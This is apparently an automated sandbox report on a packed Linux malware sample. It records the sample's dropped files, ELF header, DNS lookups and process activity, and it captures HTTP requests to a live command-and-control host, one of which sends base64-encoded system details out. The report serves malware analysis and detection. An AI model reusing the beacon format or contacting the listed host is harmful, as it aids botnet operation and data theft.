                                                                                      SHA1:DA353E80DCF1195F259CCBC32D39F5923710453F
                                                                                      SHA-256:BDAAC26D90701E063943763B7CBD9204B6F0007C6F1BCA3C7B4FE3B09CDF6091
                                                                                      SHA-512:DC651AF7AEB4A64C63986100E416A7DA4782678497B73F1CE42536DE02DB9E4115748881A56B86EC5B12E34C9FDF829BD194BEA7790FDCA7B2F5178A24930809
                                                                                      Malicious:false
                                                                                      Preview:.W..............................@......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:/usr/sbin/logrotate
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1603
                                                                                      Entropy (8bit):4.775351775205478
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:U3pqJFNKr0GVK5Npq4pNjJNcsXNU3N6NA565x3tNq4wNZNDNU1LN3o9NuqJNCNqQ:7r/Bm4prxe3MmGA4wTteJYZnCA5eC9kR
                                                                                      MD5:94CC9553773E11427B776848D2CD2B9C
                                                                                      SHA1:3C6E6EFF578B7B79147453AE7196CCA96A1B02FF
                                                                                      SHA-256:E76A3CEEAB90BEE59AB84B40757C7E99F4F7C2FB4BE1A5825E1AA1783AFC67D0
                                                                                      SHA-512:E1FAE8BAC2479AB3FA834DC171B4894F3819D748636CE5B5E805E29BA62C4345D6F40DF53AA00D2A617B5925DF9D0E1CB3503E97FC6EBDCE375AF57B13D7D6CE
                                                                                      Malicious:false
                                                                                      Preview:logrotate state -- version 2."/var/log/syslog" 2022-1-26-0:7:2."/var/log/dpkg.log" 2022-1-25-23:6:28."/var/log/speech-dispatcher/debug-flite" 2021-8-20-13:0:0."/var/log/unattended-upgrades/unattended-upgrades.log" 2022-1-25-23:6:28."/var/log/unattended-upgrades/unattended-upgrades-shutdown.log" 2021-9-17-9:23:29."/var/log/auth.log" 2022-1-25-23:6:28."/var/log/apt/term.log" 2022-1-25-23:6:28."/var/log/ppp-connect-errors" 2021-8-20-13:0:0."/var/log/apport.log" 2021-9-17-9:23:29."/var/log/speech-dispatcher/speech-dispatcher-protocol.log" 2021-8-20-13:0:0."/var/log/apt/history.log" 2022-1-25-23:6:28."/var/log/boot.log" 2021-8-20-13:0:0."/var/log/alternatives.log" 2021-9-17-9:23:29."/var/log/lightdm/*.log" 2021-8-20-13:0:0."/var/log/mail.log" 2021-8-20-13:0:0."/var/log/debug" 2021-8-20-13:0:0."/var/log/kern.log" 2022-1-25-23:6:28."/var/log/cups/access_log" 2022-1-26-0:7:2."/var/log/ufw.log" 2021-8-20-13:0:0."/var/log/speech-dispatcher/speech-dispatcher.log" 2021-8-20-13:0:0."/var/log/daemon
                                                                                      Process:/bin/gzip
                                                                                      File Type:gzip compressed data, last modified: Tue Jan 25 23:06:29 2022, from Unix
                                                                                      Category:dropped
                                                                                      Size (bytes):195
                                                                                      Entropy (8bit):6.929182462685382
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:X3H0nkK11EsEzBOkGayKvvtha0xmuidx0lVLn:X3uElzBOPardhsuidx0v
                                                                                      MD5:FEF6F49A0C111622B0EE541978799584
                                                                                      SHA1:173089A7C0C04793196B42360B686C17CB771AF0
                                                                                      SHA-256:9D5D3A7EC3DD0F67A5C00A67A7DDCA42A8C41F1A88C6DEE8FCBAC9872FFC1651
                                                                                      SHA-512:9F3C2FA30391908ADCC18CCF49F276E462E188328C1277316E05BC9F13813B102F0CCED500AD8A1000BF090E7811E1E5E617F183BF8D34E4E6372E81226B0EE4
                                                                                      Malicious:false
                                                                                      Preview:....u..a......0....8a5......b\$..8`-........ ......kH..M>..~.g^.@Y.......b....V7...4..'....q.C.t.4.\o.v...^.~.=Y.~TJ{....`.z...0.......V.DH..C.Z....8..UZ..H......#.,...h_.../.-......*...
                                                                                      Process:/bin/gzip
                                                                                      File Type:gzip compressed data, last modified: Tue Jan 25 23:06:29 2022, from Unix
                                                                                      Category:dropped
                                                                                      Size (bytes):2969
                                                                                      Entropy (8bit):7.93210111721561
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:XeltJTTXRGobWVQaPP5Ph+hTrskMxl0EDdoFxYjN2leWZV4AflZF4C:8tVVGobQQyP0ek4l5VYVpflZF3
                                                                                      MD5:D5F2351412CFA4D034B8E923396B598C
                                                                                      SHA1:5FA56BDDE60E23B2050B397CE066CE84CE72FD05
                                                                                      SHA-256:61BACB1445469188DF1B7FBC10A14CA33F5CFBB83CB2EB70E741FFEE05F21861
                                                                                      SHA-512:DCF73D529EDC15A3D1F4237888ED3DA51EB6DF07C1330213A1001809DB8C54E8A45EB2A7620BAECA7977EE8B0D61AE6056524C8ACBCCB5CCA864B5E6BEFDB4C5
                                                                                      Malicious:false
                                                                                      Preview:....u..a...\[s..~....I'.x...u&7...g.(.n..x ..X..C..._..R7..R..."..9..$="9......3.C4.).<....<e.x..X.L..8..9..P[.MC|...<at...m..aj.N.x..CG.....j3!r>....XnD,....9..._/I..Q.Rp. Y|e}. XS0..18)n....."Bb..j...M....s.$!.$I.W\..rN......#(.V.H\...O<...c.1z.....F.^k...L.{.#.....-.Dg....B..o.....35.G....<)2....J..<.o%$..W....:..,.S......e.D1.U2@.^..4e8..B.q.........z<>......Y..L.%..I7.<.R,J0_K......^.p4..._`..`2@..K...P.b2\..!%J>.z............x.D..h.L.:..t).L..5.`R.B...Z.:~0...1..`.Y.....D..E..t.o......g....L#...Q{wy1.P..Rp.|.'<O.=........&9.....$4....8^a.?.]?Y.cJ.*cr...../...I.p1-3B.a.`..?..4a5.Gpg..B.....$......n...E.A6.!......,...E....<3...7..^.....3..N.z...^/A.^dY.....7.]......nG..=....+.2@....K-.v.\..}j..qV)...v.../^..{..........20.~.c..OV..+...).5./...ol..s.}~?...........}.....+b..uELx...9Zr.u...e.Vp4)X.zP.z ...e..2(.A...^.!...9L...<....S..Z..A...`z.l....[.7<N......h..Vak[..k....S2.W.>.T@...|.."..@q.a.3.....*(.A......9A|V`z.....t.G..O ..L.EB.b...
                                                                                      File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                                      Entropy (8bit):7.942137265076855
                                                                                      TrID:
                                                                                      • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                      • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                      File name:lHxDIlc6HU
                                                                                      File size:426540
                                                                                      MD5:06beb198dd8d97ce7673d6c99c4c9ac4
                                                                                      SHA1:67e54f78e02fc7feff1fda1cb489447d7990a002
                                                                                      SHA256:bc0ba524dde5fc3c68ccbfa3b7daa8470aced65c5d88f0829ca0e28f63154a6b
                                                                                      SHA512:dfbbed3cbeb2eeceffb0585eb99fe174e5f1b616e262fcd93d787c1ef6388c06276d6a6ae4c8dee8a3f97149c5df0947998f2d48b01de0a96c9975fcafe0bcd1
                                                                                      SSDEEP:12288:vuUGbSUQf6LndsBl8c7Imd7Bb7PfZwZfYEmvozMyJ:vuuujdCr7X57HZwVEoh
                                                                                      File Content Preview:.ELF..............>......pF.....@...................@.8...@.......................@.......@......y.......y................................F.......F.............................Q.td....................................................k&1FUPX!$........(...(.

                                                                                      ELF header

                                                                                      Class:ELF64
                                                                                      Data:2's complement, little endian
                                                                                      Version:1 (current)
                                                                                      Machine:Advanced Micro Devices X86-64
                                                                                      Version Number:0x1
                                                                                      Type:EXEC (Executable file)
                                                                                      OS/ABI:UNIX - System V
                                                                                      ABI Version:0
                                                                                      Entry Point Address:0x467088
                                                                                      Flags:0x0
                                                                                      ELF Header Size:64
                                                                                      Program Header Offset:64
                                                                                      Program Header Size:56
                                                                                      Number of Program Headers:3
                                                                                      Section Header Offset:0
                                                                                      Section Header Size:64
                                                                                      Number of Section Headers:0
                                                                                      Header String Table Index:0
                                                                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                      LOAD0x00x4000000x4000000x679a30x679a34.33740x5R E0x1000
                                                                                      LOAD0x00x4680000x4680000x00xe1d4980.00000x6RW 0x1000
                                                                                      GNU_STACK0x00x00x00x00x00.00000x6RW 0x10
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 26, 2022 00:07:07.584538937 CET42836443192.168.2.2391.189.91.43
                                                                                      Jan 26, 2022 00:07:08.096600056 CET4251680192.168.2.23109.202.202.202
                                                                                      Jan 26, 2022 00:07:20.367345095 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:20.389367104 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:20.389566898 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:20.392082930 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:20.465476036 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:22.175997019 CET43928443192.168.2.2391.189.91.42
                                                                                      Jan 26, 2022 00:07:23.944802046 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:23.944910049 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:23.945333004 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:23.946264982 CET5683080192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:23.967984915 CET805683088.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:27.768100977 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:27.789824009 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:27.789992094 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:27.792016983 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:27.855848074 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:33.825404882 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:33.825721979 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:33.825913906 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:33.826369047 CET5683280192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:33.848186970 CET805683288.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:34.463524103 CET42836443192.168.2.2391.189.91.43
                                                                                      Jan 26, 2022 00:07:38.559339046 CET4251680192.168.2.23109.202.202.202
                                                                                      Jan 26, 2022 00:08:03.134205103 CET43928443192.168.2.2391.189.91.42
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 26, 2022 00:07:20.346349955 CET4907453192.168.2.238.8.8.8
                                                                                      Jan 26, 2022 00:07:20.365828037 CET53490748.8.8.8192.168.2.23
                                                                                      Jan 26, 2022 00:07:21.677762032 CET4155780192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:21.701025009 CET804155788.198.246.242192.168.2.23
                                                                                      Jan 26, 2022 00:07:25.701159954 CET4155780192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:25.915901899 CET4155780192.168.2.2388.198.246.242
                                                                                      Jan 26, 2022 00:07:27.748771906 CET4237753192.168.2.238.8.8.8
                                                                                      Jan 26, 2022 00:07:27.767879963 CET53423778.8.8.8192.168.2.23
                                                                                      Jan 26, 2022 00:09:27.404711008 CET4268880192.168.2.2388.198.246.242
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Jan 26, 2022 00:07:20.346349955 CET192.168.2.238.8.8.80x14d8Standard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                                                                      Jan 26, 2022 00:07:27.748771906 CET192.168.2.238.8.8.80x14d8Standard query (0)p3.feefreepool.netA (IP address)IN (0x0001)
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Jan 26, 2022 00:07:20.365828037 CET8.8.8.8192.168.2.230x14d8No error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                                                                      Jan 26, 2022 00:07:27.767879963 CET8.8.8.8192.168.2.230x14d8No error (0)p3.feefreepool.net88.198.246.242A (IP address)IN (0x0001)
                                                                                      • p3.feefreepool.net
                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      0192.168.2.235683088.198.246.24280
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jan 26, 2022 00:07:20.392082930 CET0OUTGET /cgi-bin/prometei.cgi?r=66&i=V9PV9LOR9Q54LN8Z HTTP/1.0
                                                                                      Host: p3.feefreepool.net
                                                                                      Jan 26, 2022 00:07:23.944802046 CET1INHTTP/1.1 200 OK
                                                                                      Date: Tue, 25 Jan 2022 23:07:27 GMT
                                                                                      Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                                                                      Content-Length: 7
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=windows-1251
                                                                                      Data Raw: 73 79 73 69 6e 66 6f
                                                                                      Data Ascii: sysinfo


                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                      1192.168.2.235683288.198.246.24280
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jan 26, 2022 00:07:27.792016983 CET2OUTGET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MDc6MjYgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNjMsIDEuMDIsIDAuNDENCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=V9PV9LOR9Q54LN8Z&h=galassia&enckey=eEVMMJjVqQk0uXubVQrg0cpsaPCF0YTQ300u/94JUf8DWnl/2ZFYvYzBew+A8bCXbnXcjcndb3Mu4EtZmkncy6kFAvReynFFJWRp7J7ZpnHwcBIFQMPivwdwBNGaVjOp8nUBt/+kkIfC8ocfXSG0Q98NVD4a66dQGlqw4sz+8p4= HTTP/1.0
                                                                                      Host: p3.feefreepool.net
                                                                                      Jan 26, 2022 00:07:33.825404882 CET3INHTTP/1.1 200 OK
                                                                                      Date: Tue, 25 Jan 2022 23:07:37 GMT
                                                                                      Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
                                                                                      Content-Length: 3
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=windows-1251
                                                                                      Data Raw: 6f 6b 21 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
                                                                                      Data Ascii: ok!Content-type: text/html; charset=windows-1251


                                                                                      System Behavior

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/logrotate
                                                                                      Arguments:/usr/sbin/logrotate /etc/logrotate.conf
                                                                                      File size:84056 bytes
                                                                                      MD5 hash:ff9f6831debb63e53a31ff8057143af6

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/logrotate
                                                                                      Arguments:n/a
                                                                                      File size:84056 bytes
                                                                                      MD5 hash:ff9f6831debb63e53a31ff8057143af6

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/gzip
                                                                                      Arguments:/bin/gzip
                                                                                      File size:97496 bytes
                                                                                      MD5 hash:beef4e1f54ec90564d2acd57c0b0c897

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/logrotate
                                                                                      Arguments:n/a
                                                                                      File size:84056 bytes
                                                                                      MD5 hash:ff9f6831debb63e53a31ff8057143af6

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/invoke-rc.d
                                                                                      Arguments:invoke-rc.d --quiet cups restart
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/invoke-rc.d
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/sbin/runlevel
                                                                                      Arguments:/sbin/runlevel
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/invoke-rc.d
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl --quiet is-enabled cups.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/invoke-rc.d
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/ls
                                                                                      Arguments:ls /etc/rc[S2345].d/S[0-9][0-9]cups
                                                                                      File size:142144 bytes
                                                                                      MD5 hash:e7793f15c2ff7e747b4bc7079f5cd4f7

                                                                                      Start time:00:07:03
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/invoke-rc.d
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:03
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl --quiet is-active cups.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:07:04
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/logrotate
                                                                                      Arguments:n/a
                                                                                      File size:84056 bytes
                                                                                      MD5 hash:ff9f6831debb63e53a31ff8057143af6

                                                                                      Start time:00:07:04
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/gzip
                                                                                      Arguments:/bin/gzip
                                                                                      File size:97496 bytes
                                                                                      MD5 hash:beef4e1f54ec90564d2acd57c0b0c897

                                                                                      Start time:00:07:04
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/sbin/logrotate
                                                                                      Arguments:n/a
                                                                                      File size:84056 bytes
                                                                                      MD5 hash:ff9f6831debb63e53a31ff8057143af6

                                                                                      Start time:00:07:04
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:04
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:04
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/rsyslog/rsyslog-rotate
                                                                                      Arguments:/usr/lib/rsyslog/rsyslog-rotate
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:04
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/rsyslog/rsyslog-rotate
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:04
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl kill -s HUP rsyslog.service
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/install
                                                                                      Arguments:/usr/bin/install -d -o man -g man -m 0755 /var/cache/man
                                                                                      File size:158112 bytes
                                                                                      MD5 hash:55e2520049dc6a62e8c94732e36cdd54

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/find
                                                                                      Arguments:/usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
                                                                                      File size:320160 bytes
                                                                                      MD5 hash:b68ef002f84cc54dd472238ba7df80ab

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/lib/systemd/systemd
                                                                                      Arguments:n/a
                                                                                      File size:1620224 bytes
                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                      Start time:00:07:02
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/mandb
                                                                                      Arguments:/usr/bin/mandb --quiet
                                                                                      File size:142432 bytes
                                                                                      MD5 hash:1dda5ea0027ecf1c2db0f5a3de7e6941

                                                                                      Start time:00:07:06
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:/tmp/lHxDIlc6HU
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:06
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:06
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pgrep lHxDIlc6HU"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:06
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:06
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pgrep
                                                                                      Arguments:pgrep lHxDIlc6HU
                                                                                      File size:30968 bytes
                                                                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                      Start time:00:07:07
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:07
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pidof lHxDIlc6HU"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:07
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:07
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pidof
                                                                                      Arguments:pidof lHxDIlc6HU
                                                                                      File size:27016 bytes
                                                                                      MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                      Start time:00:07:08
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:08
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pgrep uplugplay"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:08
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:08
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pgrep
                                                                                      Arguments:pgrep uplugplay
                                                                                      File size:30968 bytes
                                                                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                      Start time:00:07:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pidof uplugplay"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:09
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pidof
                                                                                      Arguments:pidof uplugplay
                                                                                      File size:27016 bytes
                                                                                      MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                                                      Start time:00:07:10
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:10
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "pgrep upnpsetup"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:10
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:10
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/pgrep
                                                                                      Arguments:pgrep upnpsetup
                                                                                      File size:30968 bytes
                                                                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                      Start time:00:07:12
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:12
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:sh -c "systemctl daemon-reload"
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:12
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
                                                                                      Arguments:n/a
                                                                                      File size:129816 bytes
                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                      Start time:00:07:12
                                                                                      Start date:26/01/2022
                                                                                      Path:/usr/bin/systemctl
                                                                                      Arguments:systemctl daemon-reload
                                                                                      File size:996584 bytes
                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                      Start time:00:07:14
                                                                                      Start date:26/01/2022
                                                                                      Path:/tmp/lHxDIlc6HU
                                                                                      Arguments:n/a
                                                                                      File size:426540 bytes
                                                                                      MD5 hash:06beb198dd8d97ce7673d6c99c4c9ac4

                                                                                      Start time:00:07:14
                                                                                      Start date:26/01/2022
                                                                                      Path:/bin/sh
